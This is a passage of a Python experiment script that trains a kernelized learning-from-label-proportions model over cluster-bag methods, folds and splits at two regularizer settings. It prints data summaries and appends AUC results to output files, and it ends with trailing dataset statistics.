print(test_X.tail(4).to_string())
print()
print("test_y")
print(test_y.head(4).to_string())
print(test_y.tail(4).to_string())
print()
print("bag_id")
print(bag_id)
print()
print("cont_col")
print(cont_col)
print()
print("cont_col")
print(cont_col)
print()
print("prop_dict")
print(prop_dict)
print()
print("size_dict")
print(size_dict)
# exit()
# set up parameters
KERNEL_PARAMS_direct_fixed = {
"kernel": "rbf",
"gamma": "scale",
"loss": LogisticLoss # pylint: disable=undefined-variable
}
options_direct_fixed = ("L-BFGS-B",
Helperdict({
"ftol": 1e-5,
"maxiter": 100,
"maxcor": 80
}))
TRAIN_PARAMS_direct_fixed = {
"method": options_direct_fixed,
"exclusion_param": 0
}
# initialize the model
model = KernelizedMethod( # pylint: disable=undefined-variable
**KERNEL_PARAMS_direct_fixed, regularizer=regularizer_param)
train_X_engineered, test_X_engineered = utils.data_utils.feature_engineering_cont(
train_X, test_X, cont_col)
print()
print("train_X_engineered")
print(train_X_engineered)
print(train_X_engineered.shape)
print()
print("test_X_engineered")
print(test_X_engineered)
print(test_X_engineered.shape)
# exit()
model.fit(train_X_engineered, test_X_engineered, test_y, bag_id,
prop_dict, size_dict, **TRAIN_PARAMS_direct_fixed)
pred = model.predict(test_X_engineered)
area, fprs, tprs, thresholds = model.get_roc(test_X_engineered, test_y)
print("auc = ", area)
results_string = (
dataset_name + "_" + regularizer_param_string + ", " +
str(cluster_bags_method_to_use) + ", " + str(splitnumber) + ", " +
str(foldnumber) + ", " + str(area) + "\n")
with open(cluster_bags_methodoutfile, "a") as fileto_append:
fileto_append.write(results_string)
rng = np.random.default_rng(2538482) # pylint: disable=undefined-variable
regularizer_param = 1e-3
regularizer_param_string = "1e-3"
for cluster_bags_method in range(1, 9):
if cluster_bags_method > 5:
cluster_bags_method_to_use = cluster_bags_method - 1
else:
cluster_bags_method_to_use = cluster_bags_method
cluster_bags_methodoutfile = name_dir + dataset_name + "_" + regularizer_param_string + "_MutConOutputClusterBags_" + str(
cluster_bags_method_to_use)
for foldnumber in range(1, 6):
folddir = name_dir + "Fold_" + str(foldnumber) + "/"
for splitnumber in range(1, 6):
splitdir = folddir + "Split_" + str(splitnumber) + "/"
testfile = splitdir + dataset_name + "_" + str(foldnumber) + "_" + str(
splitnumber) + "-test.csv"
cluster_dir = splitdir + "ClusterBags_" + str(
cluster_bags_method_to_use) + "/"
trainfile = cluster_dir + "full_train.csv"
random_seed = rng.integers(low=1000000, size=1)[0]
numpy_seed = rng.integers(low=1000000, size=1)[0]
if cluster_bags_method == 5:
continue
random.seed(random_seed)
np.random.seed(numpy_seed) # pylint: disable=undefined-variable
print()
print("*********starting************")
print(dataset_name + "_" + regularizer_param_string + "_Fold_" +
str(foldnumber) + "_Split_" + str(splitnumber))
print("random_seed = ", random_seed)
print("numpy_seed = ", numpy_seed)
list_of_features = []
for i in range(1, NUM_FEATURES):
list_of_features.append("x." + str(i))
list_of_features.append("constant")
full_train_df = pd.read_csv(trainfile)
test_df = pd.read_csv(testfile)
# print('experiment starts on %s' % data_path)
# experiment_start = time.time()
num_bags = len(pd.unique(full_train_df["bag"]))
if num_bags % 2 == 1:
bag_to_drop = random.choice(pd.unique(full_train_df["bag"]))
full_train_df = full_train_df[
full_train_df["bag"] != bag_to_drop].reset_index()
train_X = full_train_df[list_of_features].copy()
train_y = full_train_df["label"].copy()
test_X = test_df[list_of_features].copy()
test_y = test_df["label"].copy()
bag_id = full_train_df["bag"].to_numpy()
cont_col = list_of_features
prop_dict, size_dict = utils.bag_utils.compute_label_proportion(train_y,
bag_id)
print("train_X")
print(train_X.head(4).to_string())
print(train_X.tail(4).to_string())
print()
print("train_y")
print(train_y.head(4).to_string())
print(train_y.tail(4).to_string())
print()
print("test_X")
print(test_X.head(4).to_string())
print(test_X.tail(4).to_string())
print()
print("test_y")
print(test_y.head(4).to_string())
print(test_y.tail(4).to_string())
print()
print("bag_id")
print(bag_id)
print()
print("cont_col")
print(cont_col)
print()
print("cont_col")
print(cont_col)
print()
print("prop_dict")
print(prop_dict)
print()
print("size_dict")
print(size_dict)
# exit()
# set up parameters
KERNEL_PARAMS_direct_fixed = {
"kernel": "rbf",
"gamma": "scale",
"loss": LogisticLoss # pylint: disable=undefined-variable
}
options_direct_fixed = ("L-BFGS-B",
Helperdict({
"ftol": 1e-5,
"maxiter": 100,
"maxcor": 80
}))
TRAIN_PARAMS_direct_fixed = {
"method": options_direct_fixed,
"exclusion_param": 0
}
# initialize the model
model = KernelizedMethod( # pylint: disable=undefined-variable
**KERNEL_PARAMS_direct_fixed, regularizer=regularizer_param)
train_X_engineered, test_X_engineered = utils.data_utils.feature_engineering_cont(
train_X, test_X, cont_col)
print()
print("train_X_engineered")
print(train_X_engineered)
print(train_X_engineered.shape)
print()
print("test_X_engineered")
print(test_X_engineered)
print(test_X_engineered.shape)
# exit()
model.fit(train_X_engineered, test_X_engineered, test_y, bag_id,
prop_dict, size_dict, **TRAIN_PARAMS_direct_fixed)
pred = model.predict(test_X_engineered)
area, fprs, tprs, thresholds = model.get_roc(test_X_engineered, test_y)
print("auc = ", area)
results_string = (
dataset_name + "_" + regularizer_param_string + ", " +
str(cluster_bags_method_to_use) + ", " + str(splitnumber) + ", " +
str(foldnumber) + ", " + str(area) + "\n")
with open(cluster_bags_methodoutfile, "a") as fileto_append:
fileto_append.write(results_string)
rng = np.random.default_rng(948732) # pylint: disable=undefined-variable
regularizer_param = 1e-4
regularizer_param_string = "1e-4"
for cluster_bags_method in range(1, 9):
if cluster_bags_method > 5:
cluster_bags_method_to_use = cluster_bags_method - 1
else:
cluster_bags_method_to_use = cluster_bags_method
cluster_bags_methodoutfile = name_dir + dataset_name + "_" + regularizer_param_string + "_MutConOutputClusterBags_" + str(
cluster_bags_method_to_use)
for foldnumber in range(1, 6):
folddir = name_dir + "Fold_" + str(foldnumber) + "/"
for splitnumber in range(1, 6):
splitdir = folddir + "Split_" + str(splitnumber) + "/"
testfile = splitdir + dataset_name + "_" + str(foldnumber) + "_" + str(
splitnumber) + "-test.csv"
cluster_dir = splitdir + "ClusterBags_" + str(
cluster_bags_method_to_use) + "/"
trainfile = cluster_dir + "full_train.csv"
random_seed = rng.integers(low=1000000, size=1)[0]
numpy_seed = rng.integers(low=1000000, size=1)[0]
if cluster_bags_method == 5:
continue
random.seed(random_seed)
np.random.seed(numpy_seed) # pylint: disable=undefined-variable
print()
print("*********starting************")
print(dataset_name + "_" + regularizer_param_string + "_Fold_" +
str(foldnumber) + "_Split_" + str(splitnumber))
print("random_seed = ", random_seed)
print("numpy_seed = ", numpy_seed)
list_of_features = []
for i in range(1, NUM_FEATURES):
list_of_features.append("x." + str(i))
list_of_features.append("constant")
full_train_df = pd.read_csv(trainfile)
test_df = pd.read_csv(testfile)
# print('experiment starts on %s' % data_path)
# experiment_start = time.time()
num_bags = len(pd.unique(full_train_df["bag"]))
if num_bags % 2 == 1:
bag_to_drop = random.choice(pd.unique(full_train_df["bag"]))
full_train_df = full_train_df[
full_train_df["bag"] != bag_to_drop].reset_index()
train_X = full_train_df[list_of_features].copy()
train_y = full_train_df["label"].copy()
test_X = test_df[list_of_features].copy()
test_y = test_df["label"].copy()
bag_id = full_train_df["bag"].to_numpy()
cont_col = list_of_features
prop_dict, size_dict = utils.bag_utils.compute_label_proportion(train_y,
bag_id)
print("train_X")
print(train_X.head(4).to_string())
print(train_X.tail(4).to_string())
print()
print("train_y")
print(train_y.head(4).to_string())
print(train_y.tail(4).to_string())
print()
print("test_X")
print(test_X.head(4).to_string())
print(test_X.tail(4).to_string())
print()
print("test_y")
print(test_y.head(4).to_string())
print(test_y.tail(4).to_string())
print()
print("bag_id")
print(bag_id)
print()
print("cont_col")
print(cont_col)
print()
print("cont_col")
print(cont_col)
print()
print("prop_dict")
print(prop_dict)
print()
print("size_dict")
print(size_dict)
# exit()
# set up parameters
KERNEL_PARAMS_direct_fixed = {
"kernel": "rbf",
"gamma": "scale",
"loss": LogisticLoss # pylint: disable=undefined-variable
}
options_direct_fixed = ("L-BFGS-B",
Helperdict({
"ftol": 1e-5,
"maxiter": 100,
"maxcor": 80
}))
TRAIN_PARAMS_direct_fixed = {
"method": options_direct_fixed,
"exclusion_param": 0
}
# initialize the model
model = KernelizedMethod( # pylint: disable=undefined-variable
**KERNEL_PARAMS_direct_fixed, regularizer=regularizer_param)
train_X_engineered, test_X_engineered = utils.data_utils.feature_engineering_cont(
train_X, test_X, cont_col)
print()
print("train_X_engineered")
print(train_X_engineered)
print(train_X_engineered.shape)
print()
print("test_X_engineered")
print(test_X_engineered)
print(test_X_engineered.shape)
# exit()
model.fit(train_X_engineered, test_X_engineered, test_y, bag_id,
prop_dict, size_dict, **TRAIN_PARAMS_direct_fixed)
pred = model.predict(test_X_engineered)
area, fprs, tprs, thresholds = model.get_roc(test_X_engineered, test_y)
print("auc = ", area)
results_string = (
dataset_name + "_" + regularizer_param_string + ", " +
str(cluster_bags_method_to_use) + ", " + str(splitnumber) + ", " +
str(foldnumber) + ", " + str(area) + "\n")
with open(cluster_bags_methodoutfile, "a") as fileto_append:
fileto_append.write(results_string)
| 28.870116
| 124
| 0.611339
| 3,354
| 27,340
| 4.640429
| 0.073942
| 0.042406
| 0.054613
| 0.03598
| 0.947314
| 0.93954
| 0.93954
| 0.927204
| 0.927204
| 0.927204
| 0
| 0.015141
| 0.268032
| 27,340
| 946
| 125
| 28.900634
| 0.762592
| 0.100585
| 0
| 0.92775
| 0
| 0
| 0.076631
| 0.011023
| 0
| 0
| 0
| 0
| 0
| 1
| 0.004926
| false
| 0
| 0.011494
| 0.004926
| 0.022989
| 0.361248
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.